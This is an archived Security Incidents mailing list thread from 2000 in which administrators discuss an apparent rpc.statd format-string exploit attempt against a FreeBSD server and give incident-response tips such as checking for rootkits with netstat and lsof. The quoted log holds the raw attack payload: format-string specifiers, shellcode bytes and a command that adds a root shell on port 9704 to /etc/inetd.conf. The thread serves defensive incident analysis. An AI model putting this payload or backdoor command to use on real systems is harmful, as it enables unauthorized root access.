Security Incidents mailing list archives

Re: rpc.statd exploit?

From: Fernando Cardoso <fernando () BN PT>
Date: Fri, 18 Aug 2000 13:26:54 +0100

Huuummm, let me guess, origin was Korea? I've just had seen these SYN scans
from 210.180.16.150:

Aug 18 12:20:25  IDS198/SYN FIN Scan: 210.180.16.150:9704 -> x.x.x.x.:9704
Aug 18 12:34:19  IDS198/SYN FIN Scan: 210.180.16.150:2222 -> x.x.x.x:2222

Port 2222 is a classic. I've found lots of Korean compromised servers
droping you in a rootshell when telneting to this port.


There are a few known exploits for statd on the wild, but I don't know any
for FreeBSD. Since you found your NIC in promiscuous mode, definitely check
for a rootkit. If the kiDD1e left traces in your logs I'm sure he was clumsy
somewhere else... Did you already try a netstat -a or telneting to port
9704? If the netstat doesn't help (a replaced netstat is frequent in
rootkits) download lsof and check what's open in the server.


Fernando


_________________________________________________________________
Fernando Cardoso                        Phone:  +351 21 7982186
Network Administrator           Fax:            +351 217982185
National Library                        E-mail: fernando () bn pt
Portugal                                PGP ID: 28551CB8



Hello all,

While looking through the log files, I came across a few
peculiar lines
that appear to be an attempt to overflow the rpc.statd and
insert a root
shell into /etc/inetd.conf on port 9704.  Later,  I noticed
that the NIC
went into promisc. mode and dropped out of it twice.  Is
anyone familiar
with this exploit?  What should I be looking for to tell if it was
successful.  The system is FreeBSD 4.1-stable.  FreeBSD's website
revealed no information reguarding exploits on rpc.statd.

Any Information is appreciated.

Aug 12 02:59:14 rpc.statd: Invalid hostname to sm_mon:
^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF><BF>^E<F7><FF><BF>^F<F7><FF><BF>
^F<F7><FF><BF>^G<F7><FF><BF>^G<F7><FF><BF>%08x %08x %08x %08x
%08x %08x
%08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x
%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
M-^PM-^PM-
^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
M-^PM-^PM-
^PM-^P<EB>K^M-  v<AC>M-^C<EE> M-^M^(M-^C<C6> M- ^<B0>M-^C
<EE> M-^M^.M-^C<C6> M-^C<C3> M-^C<EB>#M-        ^<B4>1<C0>M-^C<EE>
M-^HF'M-^HF*M-^C<C6> M-^HF<AB>M-     F<B8><B0>+, M-  <F3>M-^MN
<AC>M-^MV<B8><CD>M-^@1<DB>M-
   <D8>@<CD>M-^@<E8><B0><FF><FF><FF>/bin/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/i
netd.conf;killall -HUP inetd


Dave Byrne
Systems Administrator
AtomicMinds
(858) 350-0012

Current thread:

rpc.statd exploit? Dave (Aug 18)
- Re: rpc.statd exploit? azimuth (Aug 18)
  - Re: rpc.statd exploit? Dave Dittrich (Aug 21)
- <Possible follow-ups>
- Re: rpc.statd exploit? Fernando Cardoso (Aug 18)